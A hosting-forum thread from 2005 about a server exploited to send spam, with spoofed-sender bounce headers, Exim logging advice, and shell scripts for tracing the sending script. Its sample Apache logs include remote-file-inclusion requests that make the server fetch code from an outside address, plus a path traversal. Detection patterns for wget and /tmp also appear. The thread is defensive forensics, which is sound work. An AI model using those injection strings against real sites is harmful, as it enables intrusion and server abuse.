The Community Forums


Spammer on server. Tracker says original domain is hotmail.com

Discussion in 'E-mail Discussions' started by gundamz, Feb 8, 2005.

  1. gundamz

    gundamz Well-Known Member

    Joined:
    Mar 27, 2002
    Messages:
    245
    Likes Received:
    0
    Trophy Points:
    16
    A spammer used the server to send 60K emails.
    Here's the record.
    Strangely, the original domain indicates hotmail.com. I can't find any X-mailer to track down the culprit. Can some experts tell me how I can track down the domain on the server that spams?



    This is a MIME-formatted message.
    Portions of this message may be unreadable without a MIME-capable mail program.

    --9B095B5ADSN=_01C50C8201CDBA4E0001ADBCmc7?f25.hotmail.
    Content-Type: text/plain; charset=unicode-1-1-utf-7

    This is an automatically generated Delivery Status Notification.

    Delivery to the following recipients failed.

    baligat@hotmail.com




    --9B095B5ADSN=_01C50C8201CDBA4E0001ADBCmc7?f25.hotmail.
    Content-Type: message/delivery-status

    Reporting-MTA: dns;mc7-f25.hotmail.com
    Received-From-MTA: dns;hostname.myserver.com
    Arrival-Date: Mon, 7 Feb 2005 08:28:23 -0800

    Final-Recipient: rfc822;baligat@hotmail.com
    Action: failed
    Status: 5.2.2
    Diagnostic-Code: smtp;552 5.2.2 This message is larger than the current system limit or the recipient's mailbox is full. Create a shorter message body or remove attachments and try sending it again.

    --9B095B5ADSN=_01C50C8201CDBA4E0001ADBCmc7?f25.hotmail.
    Content-Type: message/rfc822

    Received: from hostname.myserver.com ([70.84.70.148]) by mc7-f25.hotmail.com with Microsoft SMTPSVC(6.0.3790.211);
    Mon, 7 Feb 2005 08:28:23 -0800
    Received: from nobody by hostname.myserver.com with local (Exim 4.43)
    id 1CyBkT-00011o-6Q
    for baligat@hotmail.com; Tue, 08 Feb 2005 00:28:29 +0800
    To: baligat@hotmail.com
    Subject: We are currently hiring 12-18 email Customer Service Representatives
    From: Evridic Systems <aw-confirm@ebay.com>
    Reply-To: resume@Evridic.com
    MIME-Version: 1.0
    Content-Type: text/html
    Content-Transfer-Encoding: 8bit
    Message-Id: <E1CyBkT-00011o-6Q@hostname.myserver.com>
    Date: Tue, 08 Feb 2005 00:28:29 +0800
    X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
    X-AntiAbuse: Primary Hostname - hostname.myserver.com
    X-AntiAbuse: Original Domain - hotmail.com
    X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
    X-AntiAbuse: Sender Address Domain - hostname.myserver.com
    X-Source:
    X-Source-Args:
    X-Source-Dir:
    Return-Path: nobody@hostname.myserver.com
    X-OriginalArrivalTime: 07 Feb 2005 16:28:23.0241 (UTC) FILETIME=[0AE7B390:01C50D32]

    <html>
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    The key line in the header record is:

    Received: from nobody by hostname.myserver.com with local (Exim 4.43)

    This suggests that you have a vulnerable PHP script being exploited for sending out spam:

    1. Make sure that all phpBB forums have been upgraded to the latest release (install cPanel Pro, install Addon Script Manager, run the Addon Script Manager)

    2. Install mod_security with a good set of recent Filters (search the forums)

    3. Enable extended exim logging by going into WHM > Exim Configuration Editor > Advanced Mode > in first textbox:

    log_selector = +all

    You'll then get extended logging in exim to help you trace back future reported spams which should hopefully expose the culprit script.
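As an added illustration of what the extended log buys you (my code, not chirpy's and not part of cPanel), here is a small POSIX shell script that reads an exim_mainlog written with log_selector = +all and summarises local submissions by the working directory of the process that invoked sendmail. The +arguments component of +all makes Exim write a `cwd=<dir> N args: ...` line before the `<=` message-received line for each local submission, and that directory is what points at the script. The log lines below are constructed samples (only the first queue id and the hostname come from the thread); the function names and the list of "no web application should be mailing from here" directories are my own choices.

```shell
#!/bin/sh
# Constructed sample of extended exim_mainlog lines (not a real log). With
# log_selector = +all, Exim logs "cwd=<dir> N args: ..." for each local
# submission, followed by the "<=" line carrying the queue id and caller uid.
SAMPLE_LOG="$(cat <<'EOF'
2005-02-08 00:28:29 cwd=/tmp/.spam 3 args: /usr/sbin/sendmail -t -i
2005-02-08 00:28:29 1CyBkT-00011o-6Q <= nobody@hostname.myserver.com U=nobody P=local S=2431 T="We are currently hiring 12-18 email Customer Service Representatives"
2005-02-08 00:28:30 cwd=/home/example/public_html/forum 3 args: /usr/sbin/sendmail -t -i
2005-02-08 00:28:30 1CyBkU-00011p-7R <= nobody@hostname.myserver.com U=nobody P=local S=812 T="Forum registration"
2005-02-08 00:28:31 cwd=/tmp/.spam 3 args: /usr/sbin/sendmail -t -i
2005-02-08 00:28:31 1CyBkV-00011q-8S <= nobody@hostname.myserver.com U=nobody P=local S=2431 T="We are currently hiring 12-18 email Customer Service Representatives"
2005-02-08 00:28:32 cwd=/tmp/.spam 3 args: /usr/sbin/sendmail -t -i
2005-02-08 00:28:32 1CyBkW-00011r-9T <= nobody@hostname.myserver.com U=nobody P=local S=2431 T="We are currently hiring 12-18 email Customer Service Representatives"
2005-02-08 00:29:00 cwd=/var/spool/exim 4 args: /usr/sbin/exim -bd -q1h
EOF
)"

# cwd_summary [logfile]: count submissions per working directory, busiest
# first, printed as "count directory". Reads stdin when no file is given.
cwd_summary() {
    log="${1:--}"
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^cwd=/) print substr($i, 5) }' "$log" \
        | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# top_sender_dir [logfile]: the single directory that submitted the most mail.
top_sender_dir() {
    cwd_summary "$1" | head -n 1 | awk '{ print $2 }'
}

# suspicious_dirs [logfile]: sending directories under world-writable scratch
# locations, where no legitimate web application keeps its code (my list).
suspicious_dirs() {
    cwd_summary "$1" | awk '{ print $2 }' | grep -E '^(/tmp|/var/tmp|/dev/shm)(/|$)'
}

# trace_submissions [logfile]: join each cwd= line with the "<=" line that
# follows it, giving "directory<TAB>queue-id<TAB>uid", so the queue id from a
# bounce or abuse report can be traced back to the directory it was sent from.
trace_submissions() {
    log="${1:--}"
    awk '
        /cwd=/ { for (i = 1; i <= NF; i++) if ($i ~ /^cwd=/) cwd = substr($i, 5) }
        / <= /  { id = $3; uid = "?"
                  for (i = 1; i <= NF; i++) if ($i ~ /^U=/) uid = substr($i, 3)
                  printf "%s\t%s\t%s\n", cwd, id, uid }
    ' "$log"
}

# Demo on the constructed sample; on a live box pass the real file instead,
# e.g.  cwd_summary /var/log/exim_mainlog
printf '%s\n' "$SAMPLE_LOG" | cwd_summary
printf '%s\n' "$SAMPLE_LOG" | suspicious_dirs
printf '%s\n' "$SAMPLE_LOG" | trace_submissions
```

The directory name is only as trustworthy as the process that logged it: a script can chdir before calling sendmail, so treat the cwd as a starting point and confirm it against the Apache domlogs for the same minute. The `U=` field is the Unix user the message was accepted from; `nobody` on a cPanel box of that era means "something running under Apache", which is why the thread keeps coming back to web scripts.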
     
  3. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    I'm currently having a similar problem with my mail server. It appears to have the same symptoms as the previous poster. I've tried all of the previous suggestions, and so far seen no change in the amount of mail (a few hours later). Where would I find the exim logs to check for the originator?
     
  4. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    I don't really see how you could have tried all previous suggestions if you don't know where your mail server logs are :rolleyes:

    On Linux, they're with your other server logs in:
    /var/log/exim_mainlog
     
  5. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    Thank you. I'd tried everything up to reading the Exim logs as I did not know where to find them. The problem appears to have tailed off after your other suggestions. Thanks for the help.
     
  6. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Sorry about the terse response, I was dealing with a troll in a different thread just before replying to your question :eek:
     
  7. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    I understand, it happens. I'm still having trouble with spam though. I've followed all of your suggestions (the exim log is so large that I have a hard time easily paging through it). Otherwise, I just keep trying to clear the mail queue, and work on that. My apologies for my newbness to this, but is there any easy way to track which, if any, script could be doing the mail sending?
     
  8. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
  9. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    Here's what I've done so far:
    Installed mod_security.
    Installed APF
    Enabled Advanced Logging for Exim
    Now, reading through the exim log after I enabled the logging, I am finding some odd things. Example: cwd=/tmp/ .spam 3 args: /usr/sbin/sendmail -t -i. What exactly would I be looking for if a script was being abused, or if I was rootkitted?
     
  10. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    Code:
    cwd=/tmp/ .spam
    Looks like you've got some bad files in your /tmp partition. Look through there and delete suspicious files... (sounds like .spam (if it exists) should be the first to go).

    Then, you'll probably need to grep through your apache/httpd domlogs to find the insecure script(s) that the bad things are getting in through. For instance, you can search for "tmp" and "wget".

    If you don't understand anything I said, then searching this forum would probably help you find the answer (search button at the top of every page). And searching at google.com can also be quite helpful.

    But it sounds like there's a number of things you can still do to secure your server (secure /tmp, restrict permissions for wget, etc.)... I suggest hiring a competent server admin to secure your server for you, and then learning from what he did and keeping it up. It's really the least you can do if you'd like to avoid headaches like staying up all night trying to fix damage to the server, trying to recover your customers' data, trying to avoid days of downtime, etc.
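To make the "grep the domlogs for tmp and wget" step concrete, here is an added POSIX shell example (my code, not dezignguy's and not part of cPanel) that scans Apache combined-format domlog lines for those two tokens, including the URL-encoded form of the path, and reports which script was hit and by which client. The log lines are constructed samples using documentation-range addresses; the function names, the match pattern and the domlog path in the comment are my assumptions.

```shell
#!/bin/sh
# Constructed sample of Apache combined-format domlog lines (not a real log).
# The client addresses are from the RFC 5737 documentation ranges.
SAMPLE_DOMLOG="$(cat <<'EOF'
203.0.113.5 - - [07/Feb/2005:08:27:50 -0800] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [07/Feb/2005:08:28:01 -0800] "GET /forum/include.php?inc=http://198.51.100.7/c.txt&cmd=wget HTTP/1.1" 200 231 "-" "libwww-perl/5.79"
198.51.100.7 - - [07/Feb/2005:08:28:05 -0800] "GET /forum/include.php?inc=http://198.51.100.7/c.txt&cmd=cd%20/tmp HTTP/1.1" 200 231 "-" "libwww-perl/5.79"
203.0.113.5 - - [07/Feb/2005:08:28:20 -0800] "POST /forum/posting.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
198.51.100.7 - - [07/Feb/2005:08:28:30 -0800] "GET /gallery/view.php?img=..%2F..%2ftmp/.spam/x.gif HTTP/1.1" 404 200 "-" "libwww-perl/5.79"
EOF
)"

# suspicious_hits [domlog]: one "client-ip script-path" line per request whose
# URL contains "wget" or a /tmp path (plain or %2F-encoded). Field 7 of a
# combined-format line is the request URL; the query string is cut off so the
# output names the script, not the payload. Reads stdin when no file is given.
suspicious_hits() {
    log="${1:--}"
    awk '
        {
            url = tolower($7)
            split(url, parts, "[?]")
            if (url ~ /wget|\/tmp|%2ftmp/) print $1, parts[1]
        }
    ' "$log"
}

# script_summary [domlog]: hit counts per script, busiest first; the top entry
# is the script to patch, upgrade or remove.
script_summary() {
    suspicious_hits "$1" | awk '{ print $2 }' | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# suspicious_clients [domlog]: distinct client addresses behind the hits, for
# correlating with exim_mainlog timestamps or an abuse report.
suspicious_clients() {
    suspicious_hits "$1" | awk '{ print $1 }' | sort -u
}

# Demo on the constructed sample; on a live box run it over the real logs,
# e.g. (domlog path assumed):  cat /usr/local/apache/domlogs/* | script_summary
printf '%s\n' "$SAMPLE_DOMLOG" | script_summary
printf '%s\n' "$SAMPLE_DOMLOG" | suspicious_clients
```

Matching on `/tmp` rather than bare `tmp` keeps legitimate parameters such as `tmpl=` out of the results; widen the pattern only after looking at what the first pass turns up, and narrow the scan to the minutes around the `cwd=` entries in exim_mainlog when the domlogs are large.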
     
  11. RandyO

    RandyO Well-Known Member

    Joined:
    Jun 17, 2003
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    16
    I second the "Hire a Pro" comment, with servers at such apparently low prices (I say apparently as most newbs forget to take into account that they really are not qualified to run a dedicated server, and competent help really is a requirement if you plan on staying online and not blacklisted).

    Even if it is only for a few months. If a person does not know where basic logs are located, how to modify a DNS entry, or how to understand the httpd.conf file, and does not have some decent command line ability with their chosen OS, they really are just kidding themselves and disaster is actually only days away.

    Will kind of put the kibosh on the 1 Gig disk for $1 deals that seem to be popping up with even more regularity.......
     
    #11 RandyO, Feb 10, 2005
    Last edited: Feb 10, 2005
  12. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    I've cleaned up the /tmp directory, and mod_security is installed, along with APF and BFD. I think I've taken care of the spam problem. The .spam directory doesn't want to be deleted (there seem to be some hidden files), but I've set the permissions so that it shouldn't be accessible through PHP. Otherwise, everything seems fine now. I also made wget non-executable by chmodding it to 750. Thanks for the help and suggestions.
     
    #12 jmoe2008, Feb 10, 2005
    Last edited: Feb 10, 2005
  13. Solokron

    Solokron Well-Known Member

    Joined:
    Aug 8, 2003
    Messages:
    849
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Seattle
    cPanel Access Level:
    DataCenter Provider
    Heya Jonathan.

    I have noticed my exim config currently has

    log_selector = -host_lookup_failed -lost_incoming_connection

    Would

    log_selector = +all -host_lookup_failed -lost_incoming_connection

    work?

    Also, +all includes

    +address_rewrite +all_parents +arguments +connection_reject +delay_delivery +delivery_size +dnslist_defer +incoming_interface +incoming_port +lost_incoming_connection +queue_run +received_sender +received_recipients +retry_defer +sender_on_delivery +size_reject +skip_delivery +smtp_confirmation +smtp_connection +smtp_protocol_error +smtp_syntax_error +subject +tls_cipher +tls_peerdn

    correct?


     
    #13 Solokron, Sep 21, 2005
    Last edited: Sep 21, 2005
  14. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Yup. +all includes everything and is much more sensible than listing each and every option, IMO.
     
  15. Solokron

    Solokron Well-Known Member

    Joined:
    Aug 8, 2003
    Messages:
    849
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Seattle
    cPanel Access Level:
    DataCenter Provider
    And log_selector = +all -host_lookup_failed -lost_incoming_connection

    works and cleans up the logs a little correct?

     
  16. centaur777

    centaur777 Active Member

    Joined:
    Apr 9, 2004
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    An interesting thread. Leaves a few things untouched though.

    1. I was wondering if adding log_selector = +all would affect WHM->Mail Stats? What I mean is will the additional arguments be shown through WHM interface under View Mail Stats?

    For that matter does increasing Tweak Settings->Stats Log Level from 1 to say 5 put more information in View Mail Stats?

    2. What is the default log_selector setting on a default WHM box?

    3. You add log_selector = +all then remove it later from the WHM interface. Does that leave Exim with the default (earlier) setting for log_selector?

    Thanks n Bye
     
    #16 centaur777, Feb 8, 2006
    Last edited: Feb 8, 2006
  17. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess